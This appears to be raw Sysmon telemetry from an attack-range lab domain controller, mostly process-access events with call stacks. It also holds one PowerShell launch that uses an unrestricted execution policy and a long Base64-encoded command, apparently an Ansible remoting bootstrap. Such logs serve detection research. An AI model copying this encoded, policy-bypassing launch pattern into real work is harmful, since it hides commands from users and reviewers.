10341000x80000000000000003404Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003403Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003402Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003401Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003400Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003399Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003398Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003397Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003396Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003395Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-857F-5FCF-A500-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003394Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-857F-5FCF-A400-000000009101}31884496C:\Windows\system32\cmd.exe{10ACEC4A-857F-5FCF-A500-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003393Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.504{10ACEC4A-857F-5FCF-A500-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-857F-5FCF-A400-000000009101}3188C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003392Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003391Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857F-5FCF-A400-000000009101}3188C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003390Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 